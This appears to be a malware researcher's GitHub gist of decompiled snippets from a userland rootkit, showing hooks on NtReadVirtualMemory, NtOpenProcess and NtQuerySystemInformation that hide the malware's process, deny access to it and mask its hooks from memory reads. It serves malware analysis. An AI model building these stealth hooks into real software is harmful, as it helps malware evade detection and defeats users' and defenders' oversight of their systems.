Skip to content

Instantly share code, notes, and snippets.

@hasherezade
Last active December 7, 2016 03:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hasherezade/40b45481b32dd6ed4c9240a8e1b33795 to your computer and use it in GitHub Desktop.
Save hasherezade/40b45481b32dd6ed4c9240a8e1b33795 to your computer and use it in GitHub Desktop.
Snippets from MSIL userland rootkit
int __stdcall NtReadVirtualMemory_filter(int ProcessHandle, unsigned int BaseAddress, int Buffer, int NumberOfBytesToRead, int NumberOfBytesRead)
{
int pid; // esi@2
int v7; // [sp-14h] [bp-2Ch]@1
int v8; // [sp-10h] [bp-28h]@1
int v9; // [sp-Ch] [bp-24h]@1
int v10; // [sp-8h] [bp-20h]@1
int v11; // [sp-4h] [bp-1Ch]@1
int v12; // [sp+0h] [bp-18h]@0
int v13; // [sp+4h] [bp-14h]@0
unsigned int j; // [sp+4h] [bp-14h]@9
int v15; // [sp+8h] [bp-10h]@0
int v16; // [sp+8h] [bp-10h]@9
int v17; // [sp+Ch] [bp-Ch]@0
unsigned int i; // [sp+Ch] [bp-Ch]@4
int res; // [sp+10h] [bp-8h]@1
res = ((int (__cdecl *)(int, unsigned int, int, int, int))((char *)&NtReadVirtualMemory_original))(
ProcessHandle,
BaseAddress,
Buffer,
NumberOfBytesToRead,
NumberOfBytesRead);
if ( res >= 0 )
{
pid = GetProcessId(ProcessHandle);
if ( pid == GetCurrentProcessId() || ProcessHandle == -1 )
{
for ( i = 0; i < 3; ++i )
{
if ( *(_DWORD *)((char *)&loc_7 + 4 * i + 5)
&& *(_DWORD *)((char *)&loc_7 + 4 * i + 5) >= BaseAddress
&& *(_DWORD *)((char *)&loc_7 + 4 * i + 5) < NumberOfBytesToRead + BaseAddress )
{
v16 = *(_DWORD *)((char *)&loc_7 + 4 * i + 5) - BaseAddress;
for ( j = 0; j < 0x18; ++j )
*(_BYTE *)(Buffer + v16 + j) = *((_BYTE *)&loc_2B + 24 * i + j - 19);
}
}
}
}
return res;
}
int __stdcall NtOpenProcess_filter(int ProcessHandle, int DesiredAccess, int ObjectAttributes, _DWORD *ClientId)
{
int res; //result of the operation
if ( ClientId && *ClientId == *(_DWORD *)((char *)&malwareId + 3) )
res = 0xC0000022; //STATUS_ACCESS_DENIED
else
res = ((int (__stdcall *)(int, int, int, _DWORD *))((char *)&NOpentProcess_original))(
ProcessHandle,
DesiredAccess,
ObjectAttributes,
ClientId);
return res;
}
int __stdcall NtQuerySystemInformation_filter(int SystemInformationClass, unsigned int *SystemInformation, int SystemInformationLength, int ReturnLength)
{
char *v4; // esi@18
char *v5; // edi@18
unsigned int j; // [sp+8h] [bp-1Ch]@16
unsigned int i; // [sp+Ch] [bp-18h]@13
int res; // [sp+10h] [bp-14h]@1
unsigned int *sys_info_ptr; // [sp+18h] [bp-Ch]@3
unsigned int *v11; // [sp+1Ch] [bp-8h]@5
res = ((int (__stdcall *)(int, unsigned int *, int, int))NtQuerySystemInformation_original)(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);
if ( res >= 0 )
{
if ( SystemInformationClass == 5 ) //SystemProcessInformation
{
sys_info_ptr = SystemInformation;
while ( *sys_info_ptr )
{
v11 = sys_info_ptr;
sys_info_ptr = (unsigned int *)((char *)sys_info_ptr + *sys_info_ptr);
if ( *(unsigned int *)((char *)sys_info_ptr + (_DWORD)&loc_56 - 18) == loc_8 )
{
if ( *sys_info_ptr )
*v11 += *sys_info_ptr;
else
*v11 = 0;
sys_info_ptr = v11;
}
}
}
else if ( SystemInformationClass == 16 ) //SystemHandleInformation
{
for ( i = 0; i < *SystemInformation; ++i )
{
if ( *(_DWORD *)((char *)&loc_15 + (_DWORD)&SystemInformation[4 * i] - 17) == loc_8 )
{
*((_BYTE *)&loc_1D + (_DWORD)&SystemInformation[4 * i] - 20) = 0;
*(_DWORD *)((char *)&loc_23 + (_DWORD)&SystemInformation[4 * i] - 19) = 0;
*(_WORD *)((char *)&loc_1D + (_DWORD)&SystemInformation[4 * i] - 19) = 0;
*(_DWORD *)((char *)&loc_20 + (_DWORD)&SystemInformation[4 * i] - 20) = 0;
*((_BYTE *)&loc_1A + (_DWORD)&SystemInformation[4 * i] - 18) = 0;
*(_DWORD *)((char *)&loc_15 + (_DWORD)&SystemInformation[4 * i] - 17) = 0;
for ( j = i; j < *SystemInformation; ++j )
{
v4 = (char *)&loc_15 + (_DWORD)&SystemInformation[4 * (j + 1)] - 17;
v5 = (char *)&loc_15 + (_DWORD)&SystemInformation[4 * j] - 17;
*(_DWORD *)v5 = *(_DWORD *)v4;
v4 += 4;
v5 += 4;
*(_DWORD *)v5 = *(_DWORD *)v4;
v4 += 4;
v5 += 4;
*(_DWORD *)v5 = *(_DWORD *)v4;
*((_DWORD *)v5 + 1) = *((_DWORD *)v4 + 1);
}
--*SystemInformation;
--i;
}
}
}
}
return res;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment